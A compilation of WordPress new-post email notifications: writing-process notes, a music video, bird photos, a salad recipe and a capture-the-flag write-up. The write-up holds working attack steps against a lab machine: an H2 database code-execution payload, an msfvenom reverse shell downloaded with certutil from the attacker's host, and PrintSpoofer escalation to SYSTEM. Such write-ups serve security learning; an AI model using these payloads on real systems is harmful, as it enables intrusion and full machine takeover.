[New post] Prose writing instructions, notes for thyself

jukkasoft posted: " Writing instructions for myself for the future write linearlytry to complete a chapter at one temporal go - in one sessionuse at least 30-60 minutes per chapter, experiment what would be a good amount of timeExamine whether the 3-pass writing style is" Respond to this post by replying above this line New post on Jukkasoft's Blog Prose writing instructions, notes for thyself by jukkasoft Writing instructions for myself for the future write linearly try to complete a chapter at one temporal go - in one session use at least 30-60 minutes per chapter, experiment what would be a good amount of time Examine whether the 3-pass writing style is good (described below) maintain integrity of the text (yes, hard!) - experiment with tooling like Silicon Dating motivation: perfected writing process saves a lot of time and headache from Future you 3-pass writing style: rough> ready> stylize coarse definition for the what the text chapter is about write the final shape and produce the text for the paragraph stylization and typos; this is a "hygienic cycle" after which the piece is not touched ever more What's the Headquarters (office) problem in writing? The headquarters problem concept rose when I looked at the problem of the headquarters of the a fictional company, that seems to loom as a central technical writing problem in a book called Teknovelho I (2017-). I want to tie the events (plot) to be happening around an IT office however, there's 3 different headquarters, since as the company evolves over time, grows etc., these headquarters also change place during the plot when finishing the text, I found myself often asking a question: Which premises are we talking about right now, in this scene? jukkasoft | October 31, 2021 at 8:49 am | Categories: Uncategorized | URL: https://wp.me/pPBNi-2bj Comment    See all comments    Like Unsubscribe to no longer receive posts from Jukkasoft's Blog. Change your email settings at Manage Subscriptions. Trouble clicking? Copy and paste this URL into your browser: http://jukkasoft.com/2021/10/31/prose-writing-instructions-notes-for-thyself/ Thanks for flying with WordPress.com

[New post] The Blaze (Chamonix, 2020)

Franz posted: " The Blaze live at Aiguille du Midi in Chamonix, France for Cercle " Respond to this post by replying above this line New post on franzcalvo The Blaze (Chamonix, 2020) by Franz The Blaze live at Aiguille du Midi in Chamonix, France for Cercle This free site is ad-supported. Learn more ​ Franz | October 31, 2021 at 6:46 am | Categories: Music > A1 | URL: https://wp.me/p2GBZd-6Bt Comment    See all comments    Like Unsubscribe to no longer receive posts from franzcalvo. Change your email settings at Manage Subscriptions. Trouble clicking? Copy and paste this URL into your browser: https://franzcalvo.wordpress.com/2021/10/31/the-blaze-chamonix-2020/ Thanks for flying with WordPress.com

[New post] Proving Grounds – Jacko Write-up

shakuganz posted: " Hi everyone! Today's write-up is on Jacko, a 20 points Windows machine on Proving Grounds. H2 version 1.4.99 has a JNI Code Execution vulnerability that allows us to transfer a Windows reverse shell to gain access to the machine. SeImpersonatePrivilege " Respond to this post by replying above this line New post on Shakugan Proving Grounds – Jacko Write-up by shakuganz Hi everyone! Today's write-up is on Jacko, a 20 points Windows machine on Proving Grounds. H2 version 1.4.99 has a JNI Code Execution vulnerability that allows us to transfer a Windows reverse shell to gain access to the machine. SeImpersonatePrivilege is enabled which can be used to privilege escalation (PE). Let's get started! Nmap enumeration kali@kali:~$ sudo nmap -sC -sV -p- 192.168.54.66 Password: Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-30 01:33 EDT Nmap scan report for 192.168.54.66 Host is up (0.00026s latency). Not shown: 65529 filtered ports PORT STATE SERVICE VERSION 80/tcp open http Microsoft IIS httpd 10.0 | http-methods: |_ Potentially risky methods: TRACE |_http-server-header: Microsoft-IIS/10.0 |_http-title: H2 Database Engine (redirect) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds? 7680/tcp open pando-pub? 8082/tcp open http H2 database http console |_http-title: H2 Console MAC Address: 00:50:56:BF:67:10 (VMware) Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: | smb2-security-mode: | 2.02: |_ Message signing enabled but not required Web enumeration At port 8082 When accessing http://192.168.54.66:8082: After clicking on the "Connect" button without entering any password: We can see that it is actually H2 version 1.4.199. If we search online, we can find a JNI code execution vulnerability for it: https://www.exploit-db.com/exploits/49384 Testing the exploit I copied and paste the exploit (had to switch to using my own Kali as Proving Grounds'sbrowser Kali restricts the number of words allowed to copy and paste). There are a total of 5 SQL queries which the 5th query is the query that allows us to execute remote commands. Click on the "Run" button and we can see "whoami" gets executed. Access machine Generate win reverse shell MSFVenom is used to generate a reverse shell. Besides that, we will also need to launch an HTTP service to host it by using Python3. Note that only port 445 is allowed as some firewall setting or something is blocking the other ports. There maybe be other ports allowed but I did not try. Port 22, 443, and 8080 were tested but they were blocked. kali@kali:~$ msfvenom -p windows/shell_reverse_tcp LHOST=192.168.49.78 LPORT=445 -f exe > winshell.exe kali@kali:~$ sudo python3 -m http.server 80 Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ... Setup reverse shell listener Netcat is used to listen at port 445 for the coming reverse shell connection. kali@kali:~$ sudo nc -lvnp 445 listening on [any] 443 ... Obtain reverse shell Using the Remote Code Execution (RCE), transfer winshell.exe to the machine and execute it. Input the following and press the "Run" button. CALL JNIScriptEngine_eval('new java.util.Scanner(java.lang.Runtime.getRuntime().exec("certutil.exe -urlcache -f http://192.168.49.78/winshell.exe C:\\Users\\Tony\\Documents\\winshell.exe").getInputStream()).useDelimiter("\\Z").next()'); CALL JNIScriptEngine_eval('new java.util.Scanner(java.lang.Runtime.getRuntime().exec("cmd /c C:\\Users\\Tony\\Documents\\winshell.exe").getInputStream()).useDelimiter("\\Z").next()'); Your Netcat should obtain a reverse shell. listening on [any] 445 ... connect to [192.168.49.78] from (UNKNOWN) [192.168.78.66] 49787 Microsoft Windows [Version 10.0.18363.836] (c) 2019 Microsoft Corporation. All rights reserved. C:\Program Files (x86)\H2\service> Obtain local.txt flag C:\Program Files (x86)\H2\service>type C:\Users\Tony\Desktop\local.txt 88a************************** Privilege escalation Checking privileges The full path must be specified to "whoami" command as the environmental variable PATH did not include "C"\Windows\System32". C:\Program Files (x86)\H2\service>PATH PATH=C:\Users\tony\AppData\Local\Microsoft\WindowsApps; C:\Program Files (x86)\H2\service>C:\Windows\System32\whoami /priv PRIVILEGES INFORMATION ---------------------- Privilege Name Description State ============================= ========================================= ======== SeShutdownPrivilege Shut down the system Disabled SeChangeNotifyPrivilege Bypass traverse checking Enabled SeUndockPrivilege Remove computer from docking station Disabled SeImpersonatePrivilege Impersonate a client after authentication Enabled SeCreateGlobalPrivilege Create global objects Enabled SeIncreaseWorkingSetPrivilege Increase a process working set Disabled SeTimeZonePrivilege Change the time zone Disabled Since SeImpersonatePrivilege is enabled, we can use PrintSpoofer: https://github.com/itm4n/PrintSpoofer Download, transfer and execute PrintSpoofer In your Kali, download PrintSpoofer: kali@kali:~$ wget https://github.com/itm4n/PrintSpoofer/releases/download/v1.0/PrintSpoofer32.exe In the reverse shell, transfer PrintSpoofer and run it: C:\Program Files (x86)\H2\service>C:\Windows\system32\certutil.exe -urlcache -f http://192.168.49.78/PrintSpoofer32.exe C:\Users\Tony\Documents\PrintSpoofer32.exe ... C:\Program Files (x86)\H2\service>C:\Users\Tony\Documents\PrintSpoofer32.exe -i -c cmd [+] Found privilege: SeImpersonatePrivilege [+] Named pipe listening... [+] CreateProcessAsUser() OK Microsoft Windows [Version 10.0.18363.836] (c) 2019 Microsoft Corporation. All rights reserved. C:\Windows\system32>whoami nt authority\system C:\Windows\system32> Obtain proof.txt flag C:\Windows\system32>cd C:\Users\Administrator\Desktop C:\Users\Administrator\Desktop>dir Volume in drive C has no label. Volume Serial Number is AC2F-6399 Directory of C:\Users\Administrator\Desktop 07/09/2020 12:10 PM <DIR> . 07/09/2020 12:10 PM <DIR> .. 04/27/2020 09:11 PM 1,450 Microsoft Edge.lnk 10/30/2021 08:51 PM 34 proof.txt 2 File(s) 1,484 bytes 2 Dir(s) 6,955,769,856 bytes free C:\Users\Administrator\Desktop>type proof.txt de6************************** I hope these tabs have been helpful to you. Feel free to leave any comments below. You may also send me some tips if you like my work and want to see more of such content. Funds will mostly be used for my boba milk tea addiction. The link is here. This post is ad-supported ​ shakuganz | October 31, 2021 at 2:29 pm | Tags: Capture-the-flag, CTF, CTF Write-up, CVE, Cyber, Cyber security, H2, Jacko, msfvenom, PE, PG, PrintSpoofer, Privilege escalation, Proving Grounds, RCE, Security, SMB, SSH, Web, Windows, Write-up | Categories: CTF, CVE, Cyber | URL: https://wp.me/p9KTg5-14Y Comment    See all comments    Like Unsubscribe to no longer receive posts from Shakugan. Change your email settings at Manage Subscriptions. Trouble clicking? Copy and paste this URL into your browser: http://shakuganz.com/2021/10/31/proving-grounds-jacko-write-up/ Thanks for flying with WordPress.com

[New post] Prospect Park, 10/30/2021

Caleb Crain posted: " " New post on Steamboats Are Ruining Everything Prospect Park, 10/30/2021 by Caleb Crain Caleb Crain | October 31, 2021 at 2:25 am | Categories: birds, photography, Prospect Park | URL: https://wp.me/p3mI50-7LA Unsubscribe to no longer receive posts from Steamboats Are Ruining Everything. Change your email settings at Manage Subscriptions. Trouble clicking? Copy and paste this URL into your browser: https://steamthing.com/2021/10/prospect-park-10-30-2021.html

[New post] Methi Salad

Supriya Shetake posted: " Ingredients - Finely chopped Methi - 2 cupsChopped Cucumber - 1/2 cupChopped Tomato - 1/4 cupChopped Beet Root - 1/4 cupPeanut Powder - 1/2 cupChutney Powder - 1 tablespoonMix Roasted Seeds - 1 tablespoonRoasted Chana - a handfulMint Leaves - 5-6L" Respond to this post by replying above this line New post on Light on Instinct Methi Salad by Supriya Shetake Ingredients - Finely chopped Methi - 2 cups Chopped Cucumber - 1/2 cup Chopped Tomato - 1/4 cup Chopped Beet Root - 1/4 cup Peanut Powder - 1/2 cup Chutney Powder - 1 tablespoon Mix Roasted Seeds - 1 tablespoon Roasted Chana - a handful Mint Leaves - 5-6 Lemon Juice - 2 tablespoon Turmeric - 1 teaspoon Salt - as per taste Oil - 1 tablespoon Mustard Seeds - 1 teaspoon Cumin Seeds - 1 tablespoon Finely Chopped Onion - 1/2 cup Chopped Coriander - 1/4 cup Procedure - Add chopped meti, cucumber, tomato and beet root in large bowl. Also add peanut powder, chutney powder, turmeric, salt, mint leaves, roasted seeds, chana, lemon juice and mix everything. Heat oil in a pan. Add mustard, cumin seeds and let it splutter. Now add chopped onion in it and saute until onion turns golden brown. Add this to bowl's mixture. Mix everything well and serve in plate garnishing it with chopped coriander. This free site is ad-supported. Learn more ​ Supriya Shetake | October 31, 2021 at 6:12 am | Categories: Light on Food, Salad | URL: https://wp.me/p6BKs8-fi Comment    See all comments    Like Unsubscribe to no longer receive posts from Light on Instinct. Change your email settings at Manage Subscriptions. Trouble clicking? Copy and paste this URL into your browser: https://supriyashetake.wordpress.com/2021/10/31/methi-salad/ Thanks for flying with WordPress.com